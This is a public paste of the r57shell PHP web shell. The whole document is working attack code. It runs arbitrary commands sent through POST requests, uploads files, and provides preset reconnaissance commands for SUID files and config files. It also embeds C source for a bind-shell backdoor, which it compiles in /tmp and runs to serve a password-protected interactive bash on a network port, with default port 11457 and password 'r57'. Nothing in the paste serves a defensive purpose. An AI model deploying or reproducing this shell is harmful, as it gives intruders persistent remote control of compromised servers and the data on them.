Public paste
R57
By: niels | Date: Jan 28 2007 14:04 | Format: PHP | Expires: never | Size: 9.51 KB | Hits: 1612

  1. <?php
  2.  
  3.  
  4.  
  5.  
  6. /*
  7. $language='ru' -
  8. $language='eng' -
  9. */
  10.  
  11. $language='eng';
  12.  
  13. $lang=array(
  14.            'ru_text1' => ' ',
  15.            'ru_text2' => ' ',
  16.            'ru_text3' => ' ',
  17.            'ru_text4' => ' ',
  18.            'ru_text5' => ' ',
  19.            'ru_text6' => ' ',
  20.            'ru_text7' => '',
  21.            'ru_text8' => ' ',
  22.            'ru_butt1' => '',
  23.            'ru_butt2' => '',
  24.            'ru_text9' => ' /bin/bash',
  25.            'ru_text10' => ' ',
  26.            'ru_text11' => ' ',
  27.            'ru_butt3' => '',
  28.            
  29.            'eng_text1' => 'Executed command',
  30.            'eng_text2' => 'Execute command on server',
  31.            'eng_text3' => '&nbsp;Run command',
  32.            'eng_text4' => 'Work directory',
  33.            'eng_text5' => 'Upload files on server',
  34.            'eng_text6' => 'Local file',
  35.            'eng_text7' => 'Aliases',
  36.            'eng_text8' => 'Select alias',
  37.            'eng_butt1' => 'Execute',
  38.            'eng_butt2' => 'Upload',
  39.            'eng_text9' => 'Bind port to /bin/bash',
  40.            'eng_text10' => 'Port',
  41.            'eng_text11' => 'Password for access',
  42.            'eng_butt3' => 'Bind'
  43.            );
  44.  
  45.  
  46.  
  47.  
  48.  
  49. $aliases=array(
  50. 'find all suid files' => 'find / -type f -perm -04000 -ls',
  51.  
  52. 'find all sgid files' => 'find / -type f -perm -02000 -ls',
  53.  
  54. 'find config.inc.php files' => 'find / -type f -name config.inc.php',
  55.  
  56. 'find writable directories and files' => 'find / -perm -2 -ls',
  57. '----------------------------------------------------------------------------------------------------' => 'ls -la'
  58. );
  59.  
  60. $port_bind_bd_c="
  61. #include <stdio.h>
  62. #include <string.h>
  63. #include <sys/types.h>
  64. #include <sys/socket.h>
  65. #include <netinet/in.h>
  66. #include <errno.h>
  67. int main(argc,argv)
  68. int argc;
  69. char **argv;
  70. {
  71. int sockfd, newfd;
  72. char buf[30];
  73. struct sockaddr_in remote;
  74. if(argc < 3) usage(argv[0]);
  75. if(fork() == 0) { //
  76. remote.sin_family = AF_INET;
  77. remote.sin_port = htons(atoi(argv[1]));
  78. remote.sin_addr.s_addr = htonl(INADDR_ANY);
  79. sockfd = socket(AF_INET,SOCK_STREAM,0);
  80. if(!sockfd) perror("socket error");
  81. bind(sockfd, (struct sockaddr *)&remote, 0x10);
  82. listen(sockfd, 5);
  83. while(1)
  84. {
  85. newfd=accept(sockfd,0,0);
  86. dup2(newfd,0);
  87. dup2(newfd,1);
  88. dup2(newfd,2);
  89. write(newfd,"Password:",10);
  90. read(newfd,buf,sizeof(buf));
  91. if (!chpass(argv[2],buf))
  92. system("echo welcome to r57 shell && /bin/bash -i");
  93. else
  94. fprintf(stderr,"Sorry");
  95. close(newfd);
  96. }
  97. }
  98. }
  99. int usage(char *progname)
  100. {
  101. fprintf(stderr,"USAGE:%s <port num> <password>\n",progname);
  102. exit(0);
  103. }
  104. int chpass(char *base, char *entered) {
  105. int i;
  106. for(i=0;i<strlen(entered);i++)
  107. {
  108. if(entered[i] == '\n')
  109. entered[i] = '\0';
  110. }
  111. if (!strcmp(base,entered))
  112. return 0;
  113. }";
  114.  
  115. ?>
  116. <html>
  117. <head>
  118. </head>
  119. <body bgcolor="#e4e0d8">
  120. <table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000>
  121. <tr><td bgcolor=#cccccc>
  122. <!-- logo -->
  123. <font face=Verdana size=2>&nbsp;&nbsp;
  124. <font face=Webdings size=6><b>!</b></font><b>&nbsp;&nbsp;r57shell</b>
  125. </font>
  126. </td></tr><table>
  127. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  128. <tr><td align=right width=100>
  129. <?
  130. /* change dir */
  131. if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
  132. /* display information */
  133. echo "<font face=Verdana size=-2>";
  134. echo "<font color=blue><b>uname -a :&nbsp;<br>id :&nbsp;<br>pwd :&nbsp;</b></font><br>";
  135. echo "</td><td>";
  136. echo "<font face=Verdana size=-2 color=red><b>";
  137. echo "&nbsp;&nbsp;&nbsp; ".exec("uname -a")."<br>";
  138. echo "&nbsp;&nbsp;&nbsp; ".exec("id")."<br>";
  139. echo "&nbsp;&nbsp;&nbsp; ".exec("pwd")."";
  140. echo "</b></font>";
  141. echo "</font>";
  142. ?>
  143. </td></tr></table>
  144. <?
  145. /* port bind */
  146. if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
  147. {
  148.  $w_file=fopen("/tmp/bd.c","ab+") or exit();
  149.  fputs($w_file,$port_bind_bd_c);
  150.  fclose($w_file);
  151.  $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
  152.  $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']."";
  153.  $blah=exec($bind_string);
  154.  $_POST['cmd']="ps -aux | grep bd";
  155. }
  156.  
  157. if (($_POST['alias']) AND ($_POST['alias']!==""))
  158.  {
  159.  foreach ($aliases as $alias_name=>$alias_cmd) {
  160.                                                if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
  161.                                                }
  162.  }
  163.  
  164. if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"]))
  165. {
  166. copy($HTTP_POST_FILES["userfile"][tmp_name],
  167.             $_POST['dir']."/".$HTTP_POST_FILES["userfile"][name])
  168.       or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>");
  169. }
  170. ?>
  171. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  172. <tr><td bgcolor=#cccccc>
  173. <?
  174. /* command execute */
  175. if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; }
  176. echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
  177. echo "<b>";
  178. echo "<div align=center><textarea name=report cols=122 rows=15>";
  179. echo "".passthru($_POST['cmd'])."";
  180. echo "</textarea></div>";
  181. echo "</b>";
  182. ?>
  183. </td></tr></table>
  184. <table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000>
  185. <tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr>
  186. <tr><td height=23>
  187. <?
  188. /* command execute form */
  189. echo "<form name=command method=post>";
  190. echo "<font face=Verdana size=-2>";
  191. echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  192. echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>";
  193. echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  194. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
  195. else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
  196. echo "&nbsp;&nbsp;<input type=submit name=submit value=" ".$lang[$language._butt1]." ">";
  197. echo "</font>";
  198. echo "</form>";
  199. ?>
  200. </td></tr></table>
  201. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  202. <tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr>
  203. <tr><td>
  204. <?
  205. /* file upload form */
  206. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
  207. echo "<font face=Verdana size=-2>";
  208. echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  209. echo "<input type=file name=userfile size=85>&nbsp;";
  210. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
  211. else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
  212. echo "<input type=submit name=submit value=" ".$lang[$language._butt2]." ">";
  213. echo "</font>";
  214. echo "</form>";
  215. ?>
  216. </td></tr></table>
  217. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  218. <tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr>
  219. <tr><td>
  220. <?
  221. /* aliases form */
  222. echo "<form name=aliases method=POST>";
  223. echo "<font face=Verdana size=-2>";
  224. echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  225. echo "<select name=alias>";
  226. foreach ($aliases as $alias_name=>$alias_cmd)
  227.  {
  228.  echo "<option>$alias_name</option>";
  229.  }
  230.  echo "</select>";
  231. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
  232. else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
  233. echo "&nbsp;&nbsp;<input type=submit name=submit value=" ".$lang[$language._butt1]." ">";
  234. echo "</font>";
  235. echo "</form>";
  236. ?>
  237. </td></tr></table>
  238.  
  239.  
  240. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  241. <tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr>
  242. <tr><td>
  243. <?
  244. echo "<form name=bind method=POST>";
  245. echo "<font face=Verdana size=-2>";
  246. echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  247. echo "<input type=text name=port size=15 value=11457>&nbsp;";
  248. echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  249. echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;";
  250. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
  251. else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
  252. echo "<input type=hidden name=bind size=1 value=bd.c>";
  253. echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=" ".$lang[$language._butt3]." ">";
  254. echo "</font>";
  255. echo "</form>";
  256. ?>
  257. </td></tr></table>
  258.  
  259.  
  260.  
  261.  
  262. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
  263. <tr><td bgcolor=#cccccc>
  264.  
  265. </td></tr></table>
  266.